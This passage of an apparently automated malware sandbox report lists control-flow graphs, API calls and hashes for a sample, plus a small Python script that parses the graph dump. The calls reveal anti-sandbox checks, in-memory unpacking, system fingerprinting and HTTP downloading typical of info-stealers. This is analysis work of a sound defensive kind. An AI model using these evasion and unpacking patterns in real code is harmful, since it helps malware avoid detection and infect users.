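1631->1630 1632 406c6d-406c6f lstrcpy 1631->1632 1632->1630 1637 406ca0-406ca8 1635->1637
1640 406cc8-406cf5 InternetOpenA StrCmpCA 1636->1640 1641 406cbc-406cc2 lstrcpy 1636->1641
1637->1636 1637->1637 1642 406cf7 1640->1642 1643 406cfa-406cfc 1640->1643 1641->1640 1642->1643
1644 406d02-406d22 InternetConnectA 1643->1644 1645 406ea8-406ebb call 402930 1643->1645
1646 406ea1-406ea2 InternetCloseHandle 1644->1646 1647 406d28-406d5d HttpOpenRequestA 1644->1647
1654 406ec9-406ee0 call 402a20 * 2 1645->1654 1655 406ebd-406ebf 1645->1655 1646->1645
1649 406d63-406d65 1647->1649 1650 406e94-406e9e InternetCloseHandle 1647->1650
1652 406d67-406d77 InternetSetOptionA 1649->1652 1653 406d7d-406dad HttpSendRequestA HttpQueryInfoA
1649->1653 1650->1646 1652->1653 1658 406dd4-406de4 call 423f60 1653->1658
1659 406daf-406dd3 call 4273f0 call 402a20 * 2 1653->1659 1655->1654 1656 406ec1-406ec3 lstrcpy
1655->1656 1656->1654 1658->1659 1668 406de6-406de8 1658->1668
1670 406e8d-406e8e InternetCloseHandle 1668->1670 1671 406dee-406e07 InternetReadFile 1668->1671
1670->1650 1671->1670 1673 406e0d 1671->1673 1675 406e10-406e15 1673->1675 1675->1670
1676 406e17-406e3d call 427520 1675->1676 1679 406e44-406e51 call 402930 1676->1679
1680 406e3f call 402a20 1676->1680 1684 406e61-406e8b call 402a20 InternetReadFile 1679->1684
1685 406e53-406e57 1679->1685 1680->1679 1684->1670 1684->1675 1685->1684
1686 406e59-406e5b lstrcpy 1685->1686 1686->1684
"""

# A block address is "hex" or "hex-hex"; a plain API name never matches this.
NODE_ADDR = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


def parse_cfg(text):
    """Return (blocks, edges): blocks maps id -> {"addr", "ops"}, edges is a
    list of (src, dst).  'call X' is kept as one op; '* N' repeats the
    previous op N times, mirroring the dump's shorthand."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                              # edge
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                          # internal call target
            blocks[current]["ops"].append("call " + tokens[i + 1])
            i += 2
        elif tok == "*":                             # repeat count for last op
            ops = blocks[current]["ops"]
            ops.extend([ops[-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        elif tok.isdigit() and i + 1 < len(tokens) and NODE_ADDR.match(tokens[i + 1]):
            current = int(tok)                       # new basic block
            blocks[current] = {"addr": tokens[i + 1], "ops": []}
            i += 2
        else:                                        # imported API name
            blocks[current]["ops"].append(tok)
            i += 1
    return blocks, edges


def entry_block(blocks):
    """The function entry is the block with the lowest start address."""
    return min(blocks, key=lambda b: int(blocks[b]["addr"].split("-")[0], 16))


def shortest_path(edges, start, goal):
    """Plain BFS over the edge list; returns the block ids or None."""
    succ = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    prev, queue = {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in succ.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def blocks_calling(blocks, api):
    return sorted(b for b, info in blocks.items() if api in info["ops"])


def api_sequence(blocks, path):
    """External APIs along a path, skipping 'call <internal>' ops."""
    return [op for b in path for op in blocks[b]["ops"] if not op.startswith("call ")]


def first_reach(blocks, edges, api):
    """Shortest entry-to-api path and the APIs executed on the way."""
    start, best = entry_block(blocks), None
    for target in blocks_calling(blocks, api):
        p = shortest_path(edges, start, target)
        if p and (best is None or len(p) < len(best)):
            best = p
    return best, (api_sequence(blocks, best) if best else [])


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_406C40)
    path, apis = first_reach(blocks, edges, "InternetReadFile")
    print(" -> ".join(blocks[b]["addr"] for b in path))
    print(apis)
```

The dump carries no executed/not-executed colouring, so the path found is the shortest structural path, not necessarily the one taken in the sandbox run; the `Executed` legend above refers to the rendered graph only.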

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1689 422910-422953 GetWindowsDirectoryA 1690 422955 1689->1690 1691 42295c-4229ba GetVolumeInformationA 1689->1691 1690->1691 1692 4229bc-4229c2 1691->1692 1693 4229c4-4229d7 1692->1693 1694 4229d9-4229f0 GetProcessHeap HeapAlloc 1692->1694 1693->1692 1695 4229f2-4229f4 1694->1695 1696 4229f6-422a14 wsprintfA 1694->1696 1697 422a2b-422a42 call 4273f0 1695->1697 1696->1697
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,02D8A440,00000000), ref: 0042294B
                                                      • GetVolumeInformationA.KERNEL32(0042A650,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0042297C
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004229DF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004229E6
                                                      • wsprintfA.USER32 ref: 00422A0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: -B$:\$C
                                                      • API String ID: 1325379522-1437955
                                                      • Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction ID: 562ad2215438343aebe80b64a3c577c541e91a378324e6c4921a498218fa886a
                                                      • Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction Fuzzy Hash: D331A5B1E08219AFC714DFB89A44AEFBFB8EB18340F00016AE505E7650E2748A408BA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1761 2c7003c-2c70047 1762 2c7004c-2c70263 call 2c70a3f call 2c70e0f call 2c70d90 VirtualAlloc 1761->1762 1763 2c70049 1761->1763 1778 2c70265-2c70289 call 2c70a69 1762->1778 1779 2c7028b-2c70292 1762->1779 1763->1762 1784 2c702ce-2c703c2 VirtualProtect call 2c70cce call 2c70ce7 1778->1784 1780 2c702a1-2c702b0 1779->1780 1783 2c702b2-2c702cc 1780->1783 1780->1784 1783->1780 1790 2c703d1-2c703e0 1784->1790 1791 2c703e2-2c70437 call 2c70ce7 1790->1791 1792 2c70439-2c704b8 VirtualFree 1790->1792 1791->1790 1793 2c705f4-2c705fe 1792->1793 1794 2c704be-2c704cd 1792->1794 1797 2c70604-2c7060d 1793->1797 1798 2c7077f-2c70789 1793->1798 1796 2c704d3-2c704dd 1794->1796 1796->1793 1800 2c704e3-2c70505 1796->1800 1797->1798 1803 2c70613-2c70637 1797->1803 1801 2c707a6-2c707b0 1798->1801 1802 2c7078b-2c707a3 1798->1802 1812 2c70517-2c70520 1800->1812 1813 2c70507-2c70515 1800->1813 1805 2c707b6-2c707cb 1801->1805 1806 2c7086e-2c708be LoadLibraryA 1801->1806 1802->1801 1807 2c7063e-2c70648 1803->1807 1809 2c707d2-2c707d5 1805->1809 1811 2c708c7-2c708f9 1806->1811 1807->1798 1810 2c7064e-2c7065a 1807->1810 1814 2c707d7-2c707e0 1809->1814 1815 2c70824-2c70833 1809->1815 1810->1798 1816 2c70660-2c7066a 1810->1816 1817 2c70902-2c7091d 1811->1817 1818 2c708fb-2c70901 1811->1818 1819 2c70526-2c70547 1812->1819 1813->1819 1820 2c707e4-2c70822 1814->1820 1821 2c707e2 1814->1821 1823 2c70839-2c7083c 1815->1823 1822 2c7067a-2c70689 1816->1822 1818->1817 1824 2c7054d-2c70550 1819->1824 1820->1809 1821->1815 1825 2c70750-2c7077a 1822->1825 1826 2c7068f-2c706b2 1822->1826 1823->1806 1827 2c7083e-2c70847 1823->1827 1829 2c70556-2c7056b 1824->1829 1830 2c705e0-2c705ef 1824->1830 1825->1807 1831 2c706b4-2c706ed 1826->1831 1832 2c706ef-2c706fc 1826->1832 1833 2c7084b-2c7086c 1827->1833 1834 2c70849 1827->1834 1835 2c7056f-2c7057a 1829->1835 1836 2c7056d 1829->1836 1830->1796 1831->1832 1837 2c706fe-2c70748 1832->1837 1838 2c7074b 1832->1838 1833->1823 1834->1806 1841 2c7057c-2c70599 1835->1841 1842 2c7059b-2c705bb 1835->1842 1836->1830 1837->1838 1838->1822 1845 2c705bd-2c705db 1841->1845 1842->1845 1845->1824
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C7024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1846 404bc0-404bce 1847 404bd0-404bd5 1846->1847 1847->1847 1848 404bd7-404c48 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 402a20 1847->1848
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800,02D8A4E0), ref: 00404BF7
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C01
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C0B
                                                      • lstrlenA.KERNEL32(?,00000000,?), ref: 00404C1F
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 00404C27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@$CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1683549937-4251816714
                                                      • Opcode ID: 285894264c2d7e9187e750985268b8b3b2c891db7afd2989fead038aed9c22b4
                                                      • Instruction ID: 1bd60353331dbecd9a7383d9733d23d0053dd466cc4828cfdfd0774d9622719e
                                                      • Opcode Fuzzy Hash: 285894264c2d7e9187e750985268b8b3b2c891db7afd2989fead038aed9c22b4
                                                      • Instruction Fuzzy Hash: D8012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390EB7459058FD4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1851 401030-401055 GetCurrentProcess VirtualAllocExNuma 1852 401057-401058 ExitProcess 1851->1852 1853 40105e-40107b VirtualAlloc 1851->1853 1854 401082-401088 1853->1854 1855 40107d-401080 1853->1855 1856 4010b1-4010b6 1854->1856 1857 40108a-4010ab VirtualFree 1854->1857 1855->1854 1857->1856
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00000000,00000000,?,?,00421E5A), ref: 00401046
                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00421E5A), ref: 0040104D
                                                      • ExitProcess.KERNEL32 ref: 00401058
                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,00421E5A), ref: 0040106C
                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,?,?,00421E5A), ref: 004010AB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                                      • String ID:
                                                      • API String ID: 3477276466-0
                                                      • Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction ID: aa33e4c314b55322e5f005f032d3d73aad5dab283e8b13059c6bb542b9569755
                                                      • Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction Fuzzy Hash: 5E0144713403047BE7240A656C1AF6B77AEA781B01F209029F744F33D0DAB1EA008AB8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1858 41f070-41f095 call 402930 1861 41f097-41f09f 1858->1861 1862 41f0a9-41f0ad call 406c40 1858->1862 1861->1862 1863 41f0a1-41f0a3 lstrcpy 1861->1863 1865 41f0b2-41f0c8 StrCmpCA 1862->1865 1863->1862 1866 41f0f1-41f0f8 call 402a20 1865->1866 1867 41f0ca-41f0e2 call 402a20 call 402930 1865->1867 1873 41f100-41f108 1866->1873 1876 41f125-41f180 call 402a20 * 10 1867->1876 1877 41f0e4-41f0ec 1867->1877 1873->1873 1875 41f10a-41f117 call 402930 1873->1875 1875->1876 1884 41f119 1875->1884 1877->1876 1879 41f0ee-41f0ef 1877->1879 1883 41f11e-41f11f lstrcpy 1879->1883 1883->1876 1884->1883
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F0A3
                                                      • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F5C8), ref: 0041F0BE
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F11F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID: ERROR
                                                      • API String ID: 3722407311-2861137601
                                                      • Opcode ID: e2c20483307cdc97fa64b1e63de679ed1099f7a5a128cf85c2fdf253d432bab4
                                                      • Instruction ID: 2f8a9757f64988c9f480c6ae0c275d0c92c3e801e747b2960019797ab098cc34
                                                      • Opcode Fuzzy Hash: e2c20483307cdc97fa64b1e63de679ed1099f7a5a128cf85c2fdf253d432bab4
                                                      • Instruction Fuzzy Hash: 152137707101069BCB21FF79DD4969B37A4AF54304F10543AB84AEB2D2DE78DC598B98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1903 4010c0-4010cb 1904 4010d0-4010dc 1903->1904 1906 4010de-4010f3 GlobalMemoryStatusEx 1904->1906 1907 401112-401114 ExitProcess 1906->1907 1908 4010f5-401106 1906->1908 1909 401108 1908->1909 1910 40111a-40111d 1908->1910 1909->1907 1911 40110a-401110 1909->1911 1911->1907 1911->1910
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 803317263-2766056989
                                                      • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction ID: 822a68ba0681b22967503a2222785f0e102d58cfae2bd9798b899adfc8918474
                                                      • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction Fuzzy Hash: A8F027701082444BEB186A64DD4A32EF7D9EB46350F10493BEEDAE72E2E278C840857F

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1912 422ca0-422cf2 GetProcessHeap HeapAlloc GetComputerNameA 1913 422d14-422d29 1912->1913 1914 422cf4-422d06 1912->1914
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422CCF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422CD6
                                                      • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422CEA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocComputerNameProcess
                                                      • String ID:
                                                      • API String ID: 4203777966-0
                                                      • Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction ID: 1ad5e2c4eb5efa73f1b35bfbbb8ccb03f83dc81d7400d569231bf54a936ba5f3
                                                      • Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction Fuzzy Hash: 2301D672B44254ABC714CF99ED45B9AF7B8F744B21F10026BFD15D3780D7B859008AE1
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D6D466
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02D6D486
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D6C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2d6c000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: f7413f8827ad7830549f11e1187988c5fb0483a71cd22e54a64437acd7acadcd
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: FAF096313007117BD7243BF9F88DBBE76E9AF49624F100628E696D19C0DB74FC458A61
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,02C70223,?,?), ref: 02C70E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,02C70223,?,?), ref: 02C70E1E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D6D14E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D6C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2d6c000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 511d06dc684d56cbd17a01e37b5f9fa2299290b01b63261b7e1140279adca5fe
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 87112A79A00208EFDB01DF98C989E98BBF5EB08350F1580A4F9489B361D375EA50DF90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81C89
                                                      • lstrlen.KERNEL32(004317A0), ref: 02C81C94
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81CB6
                                                      • lstrcat.KERNEL32(00000000,004317A0), ref: 02C81CC2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81CE9
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C81CFE
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81D1E
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C81D38
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81D76
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81DA9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81DD1
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81DDC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E03
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C81E15
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E37
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C81E43
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E6B
                                                      • lstrlen.KERNEL32(?), ref: 02C81E7F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E9C
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81EAA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81ED0
                                                      • lstrlen.KERNEL32(00638D00), ref: 02C81EE6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F10
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81F1B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F46
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C81F58
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F7A
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C81F86
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81FAF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81FDC
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81FE7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8200E
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C82020
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82042
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8204E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82077
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C820A6
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C820B1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C820D8
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C820EA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8210C
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C82118
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82141
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82170
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8217B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C821A4
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C821D0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C821ED
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C821F9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8221F
                                                      • lstrlen.KERNEL32(006389A8), ref: 02C82235
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82269
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8227D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8229A
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C822A6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C822CC
                                                      • lstrlen.KERNEL32(00638BDC), ref: 02C822E2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82316
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8232A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82347
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C82353
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82379
                                                      • lstrlen.KERNEL32(00638CE8), ref: 02C8238F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C823B7
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C823C2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C823ED
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C823FF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8241E
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8242A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8244F
                                                      • lstrlen.KERNEL32(?), ref: 02C82463
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82487
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C82495
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C824BA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C824F6
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C82505
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8252D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C82538
